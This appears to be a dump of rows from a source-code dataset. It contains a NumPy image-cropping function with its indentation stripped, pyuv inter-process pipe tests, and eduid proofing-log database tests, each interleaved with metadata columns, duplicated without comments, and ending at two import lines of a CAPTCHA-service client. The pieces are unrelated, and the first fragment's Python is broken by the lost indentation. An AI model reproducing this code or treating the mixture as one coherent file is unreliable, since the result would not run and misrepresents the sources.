def crop(data, seg=None, crop_size=128, margins=(0, 0, 0), crop_type="center",
pad_mode='constant', pad_kwargs={'constant_values': 0},
pad_mode_seg='constant', pad_kwargs_seg={'constant_values': 0}):
if not isinstance(data, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
data_shape = tuple([len(data)] + list(data[0].shape))
data_dtype = data[0].dtype
dim = len(data_shape) - 2
if seg is not None:
seg_shape = tuple([len(seg)] + list(seg[0].shape))
seg_dtype = seg[0].dtype
if not isinstance(seg, (list, tuple, np.ndarray)):
raise TypeError("data has to be either a numpy array or a list")
assert all([i == j for i, j in zip(seg_shape[2:], data_shape[2:])]), "data and seg must have the same spatial " \
"dimensions. Data: %s, seg: %s" % \
(str(data_shape), str(seg_shape))
if type(crop_size) not in (tuple, list, np.ndarray):
crop_size = [crop_size] * dim
else:
assert len(crop_size) == len(
data_shape) - 2, "If you provide a list/tuple as center crop make sure it has the same dimension as your " \
"data (2d/3d)"
if not isinstance(margins, (np.ndarray, tuple, list)):
margins = [margins] * dim
data_return = np.zeros([data_shape[0], data_shape[1]] + list(crop_size), dtype=data_dtype)
if seg is not None:
seg_return = np.zeros([seg_shape[0], seg_shape[1]] + list(crop_size), dtype=seg_dtype)
else:
seg_return = None
for b in range(data_shape[0]):
data_shape_here = [data_shape[0]] + list(data[b].shape)
if seg is not None:
seg_shape_here = [seg_shape[0]] + list(seg[b].shape)
if crop_type == "center":
lbs = get_lbs_for_center_crop(crop_size, data_shape_here)
elif crop_type == "random":
lbs = get_lbs_for_random_crop(crop_size, data_shape_here, margins)
else:
raise NotImplementedError("crop_type must be either center or random")
need_to_pad = [[0, 0]] + [[abs(min(0, lbs[d])),
abs(min(0, data_shape_here[d + 2] - (lbs[d] + crop_size[d])))]
for d in range(dim)]
ubs = [min(lbs[d] + crop_size[d], data_shape_here[d+2]) for d in range(dim)]
lbs = [max(0, lbs[d]) for d in range(dim)]
slicer_data = [slice(0, data_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
data_cropped = data[b][tuple(slicer_data)]
if seg_return is not None:
slicer_seg = [slice(0, seg_shape_here[1])] + [slice(lbs[d], ubs[d]) for d in range(dim)]
seg_cropped = seg[b][tuple(slicer_seg)]
if any([i > 0 for j in need_to_pad for i in j]):
data_return[b] = np.pad(data_cropped, need_to_pad, pad_mode, **pad_kwargs)
if seg_return is not None:
seg_return[b] = np.pad(seg_cropped, need_to_pad, pad_mode_seg, **pad_kwargs_seg)
else:
data_return[b] = data_cropped
if seg_return is not None:
seg_return[b] = seg_cropped
return data_return, seg_return
def random_crop(data, seg=None, crop_size=128, margins=[0, 0, 0]):
return crop(data, seg, crop_size, margins, 'random')
def pad_nd_image_and_seg(data, seg, new_shape=None, must_be_divisible_by=None, pad_mode_data='constant',
np_pad_kwargs_data=None, pad_mode_seg='constant', np_pad_kwargs_seg=None):
sample_data = pad_nd_image(data, new_shape, mode=pad_mode_data, kwargs=np_pad_kwargs_data,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
if seg is not None:
sample_seg = pad_nd_image(seg, new_shape, mode=pad_mode_seg, kwargs=np_pad_kwargs_seg,
return_slicer=False, shape_must_be_divisible_by=must_be_divisible_by)
else:
sample_seg = None
return sample_data, sample_seg
| true
| true
|
790b02247d23dd0853cbf0a6b0028ba2c23b6b70
| 4,497
|
py
|
Python
|
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | 1
|
2020-01-21T11:10:38.000Z
|
2020-01-21T11:10:38.000Z
|
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
tests/test_ipc.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
import sys
from common import unittest2, platform_skip
import pyuv
TEST_PORT = 1234
if sys.platform == 'win32':
TEST_PIPE = '\\\\.\\pipe\\test-pipe'
else:
TEST_PIPE = 'test-pipe'
@platform_skip(["win32"])
class IPCTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_client_connection(self, client, error):
client.close()
self.connections.remove(client)
def make_many_connections(self):
for i in range(100):
conn = pyuv.TCP(self.loop)
self.connections.append(conn)
conn.connect(("127.0.0.1", TEST_PORT), self.on_client_connection)
def on_ipc_connection(self, handle, error):
if self.local_conn_accepted:
return
conn = pyuv.TCP(self.loop)
self.tcp_server.accept(conn)
conn.close()
self.tcp_server.close()
self.local_conn_accepted = True
def on_channel_read(self, handle, data, pending, error):
if self.tcp_server is None:
self.assertEqual(pending, pyuv.UV_TCP)
self.tcp_server = pyuv.TCP(self.loop)
self.channel.accept(self.tcp_server)
self.tcp_server.listen(self.on_ipc_connection, 12)
self.assertEqual(data.strip(), b"hello")
self.channel.write(b"world")
self.make_many_connections()
else:
if data.strip() == b"accepted_connection":
self.assertEqual(pending, pyuv.UV_UNKNOWN_HANDLE)
self.channel.close()
def test_ipc1(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable , args=["proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
def test_ipc2(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
@platform_skip(["win32"])
class IPCSendRecvTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_channel_read(self, handle, data, pending, error):
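        # The child process echoes the pipe handle back over the IPC channel;
        # `pending` reports that a named-pipe handle is waiting to be accepted.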
self.assertEqual(pending, pyuv.UV_NAMED_PIPE)
self.recv_pipe = pyuv.Pipe(self.loop)
self.channel.accept(self.recv_pipe)
self.channel.close()
self.send_pipe.close()
self.recv_pipe.close()
def test_ipc_send_recv(self):
# Handle that will be sent to the process and back
self.send_pipe = pyuv.Pipe(self.loop, True)
self.send_pipe.bind(TEST_PIPE)
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.write2(b".", self.send_pipe)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
if __name__ == '__main__':
unittest2.main(verbosity=2)
| 37.165289
| 136
| 0.648655
|
import sys
from common import unittest2, platform_skip
import pyuv
TEST_PORT = 1234
if sys.platform == 'win32':
TEST_PIPE = '\\\\.\\pipe\\test-pipe'
else:
TEST_PIPE = 'test-pipe'
@platform_skip(["win32"])
class IPCTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_client_connection(self, client, error):
client.close()
self.connections.remove(client)
def make_many_connections(self):
for i in range(100):
conn = pyuv.TCP(self.loop)
self.connections.append(conn)
conn.connect(("127.0.0.1", TEST_PORT), self.on_client_connection)
def on_ipc_connection(self, handle, error):
if self.local_conn_accepted:
return
conn = pyuv.TCP(self.loop)
self.tcp_server.accept(conn)
conn.close()
self.tcp_server.close()
self.local_conn_accepted = True
def on_channel_read(self, handle, data, pending, error):
if self.tcp_server is None:
self.assertEqual(pending, pyuv.UV_TCP)
self.tcp_server = pyuv.TCP(self.loop)
self.channel.accept(self.tcp_server)
self.tcp_server.listen(self.on_ipc_connection, 12)
self.assertEqual(data.strip(), b"hello")
self.channel.write(b"world")
self.make_many_connections()
else:
if data.strip() == b"accepted_connection":
self.assertEqual(pending, pyuv.UV_UNKNOWN_HANDLE)
self.channel.close()
def test_ipc1(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable , args=["proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
def test_ipc2(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
@platform_skip(["win32"])
class IPCSendRecvTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_channel_read(self, handle, data, pending, error):
self.assertEqual(pending, pyuv.UV_NAMED_PIPE)
self.recv_pipe = pyuv.Pipe(self.loop)
self.channel.accept(self.recv_pipe)
self.channel.close()
self.send_pipe.close()
self.recv_pipe.close()
def test_ipc_send_recv(self):
self.send_pipe = pyuv.Pipe(self.loop, True)
self.send_pipe.bind(TEST_PIPE)
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.write2(b".", self.send_pipe)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
if __name__ == '__main__':
unittest2.main(verbosity=2)
| true
| true
|
790b035b77f1a16e7ef28d292d46cfac5ec2ace2
| 11,257
|
py
|
Python
|
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | 12
|
2015-08-28T12:05:32.000Z
|
2020-06-23T13:31:29.000Z
|
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2016-10-24T06:37:33.000Z
|
2016-11-21T11:39:39.000Z
|
# -*- coding: utf-8 -*-
from copy import deepcopy
from unittest import TestCase
from eduid_userdb.fixtures.users import mocked_user_standard
from eduid_userdb.logs.db import ProofingLog
from eduid_userdb.logs.element import (
LetterProofing,
MailAddressProofing,
PhoneNumberProofing,
ProofingLogElement,
SeLegProofing,
SeLegProofingFrejaEid,
TeleAdressProofing,
TeleAdressProofingRelation,
)
from eduid_userdb.testing import MongoTemporaryInstance
from eduid_userdb.user import User
__author__ = 'lundberg'
class TestProofingLog(TestCase):
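    # Most tests below follow the same pattern: build a data dict, wrap it in the
    # matching *Proofing log element, save it through ProofingLog, then assert that
    # the stored document carries the expected fields.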
def setUp(self):
self.tmp_db = MongoTemporaryInstance.get_instance()
self.proofing_log_db = ProofingLog(db_uri=self.tmp_db.uri)
self.user = User.from_dict(mocked_user_standard.to_dict())
def tearDown(self):
self.proofing_log_db._drop_whole_collection()
def test_id_proofing_data(self):
proofing_element = ProofingLogElement(
eppn=self.user.eppn, created_by='test', proofing_method='test', proofing_version='test'
)
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'test')
def test_teleadress_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_teleadress_proofing_relation(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched_by_navet',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'mobile_number_registered_to': 'registered_national_identity_number',
'registered_relation': 'registered_relation_to_user',
'registered_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofingRelation(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched_by_navet')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_letter_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'nin': 'some_nin',
'letter_sent_to': {'name': {'some': 'data'}, 'address': {'some': 'data'}},
'transaction_id': 'some transaction id',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = LetterProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['letter_sent_to'])
self.assertIsNotNone(hit['transaction_id'])
self.assertEqual(hit['proofing_method'], 'letter')
self.assertEqual(hit['proofing_version'], 'test')
def test_mail_address_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'mail_address': 'some_mail_address',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = MailAddressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'e-mail')
self.assertEqual(hit['mail_address'], 'some_mail_address')
def test_phone_number_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'sms')
self.assertEqual(hit['phone_number'], 'some_phone_number')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'vetting_by': 'provider',
'transaction_id': 'transaction_id',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'provider')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing_freja(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'transaction_id': 'transaction_id',
'opaque_data': 'some data',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofingFrejaEid(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'Freja eID')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['opaque_data'], 'some data')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_blank_string_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = ''
self.assertFalse(self.proofing_log_db.save(proofing_element))
def test_boolean_false_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = 0
self.assertTrue(self.proofing_log_db.save(proofing_element))
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = False
self.assertTrue(self.proofing_log_db.save(proofing_element))
| 40.203571
| 99
| 0.616416
|
from copy import deepcopy
from unittest import TestCase
from eduid_userdb.fixtures.users import mocked_user_standard
from eduid_userdb.logs.db import ProofingLog
from eduid_userdb.logs.element import (
LetterProofing,
MailAddressProofing,
PhoneNumberProofing,
ProofingLogElement,
SeLegProofing,
SeLegProofingFrejaEid,
TeleAdressProofing,
TeleAdressProofingRelation,
)
from eduid_userdb.testing import MongoTemporaryInstance
from eduid_userdb.user import User
__author__ = 'lundberg'
class TestProofingLog(TestCase):
def setUp(self):
self.tmp_db = MongoTemporaryInstance.get_instance()
self.proofing_log_db = ProofingLog(db_uri=self.tmp_db.uri)
self.user = User.from_dict(mocked_user_standard.to_dict())
def tearDown(self):
self.proofing_log_db._drop_whole_collection()
def test_id_proofing_data(self):
proofing_element = ProofingLogElement(
eppn=self.user.eppn, created_by='test', proofing_method='test', proofing_version='test'
)
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'test')
def test_teleadress_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_teleadress_proofing_relation(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched_by_navet',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'mobile_number_registered_to': 'registered_national_identity_number',
'registered_relation': 'registered_relation_to_user',
'registered_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofingRelation(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched_by_navet')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_letter_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'nin': 'some_nin',
'letter_sent_to': {'name': {'some': 'data'}, 'address': {'some': 'data'}},
'transaction_id': 'some transaction id',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = LetterProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['letter_sent_to'])
self.assertIsNotNone(hit['transaction_id'])
self.assertEqual(hit['proofing_method'], 'letter')
self.assertEqual(hit['proofing_version'], 'test')
def test_mail_address_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'mail_address': 'some_mail_address',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = MailAddressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'e-mail')
self.assertEqual(hit['mail_address'], 'some_mail_address')
def test_phone_number_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'sms')
self.assertEqual(hit['phone_number'], 'some_phone_number')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'vetting_by': 'provider',
'transaction_id': 'transaction_id',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'provider')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing_freja(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'transaction_id': 'transaction_id',
'opaque_data': 'some data',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofingFrejaEid(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'Freja eID')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['opaque_data'], 'some data')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_blank_string_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = ''
self.assertFalse(self.proofing_log_db.save(proofing_element))
def test_boolean_false_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = 0
self.assertTrue(self.proofing_log_db.save(proofing_element))
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = False
self.assertTrue(self.proofing_log_db.save(proofing_element))
| true
| true
|
790b036e68901d1876285f11feba3daadc8966dd
| 1,795
|
py
|
Python
|
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
from aioanticaptcha.antinetworking import *
import asyncio
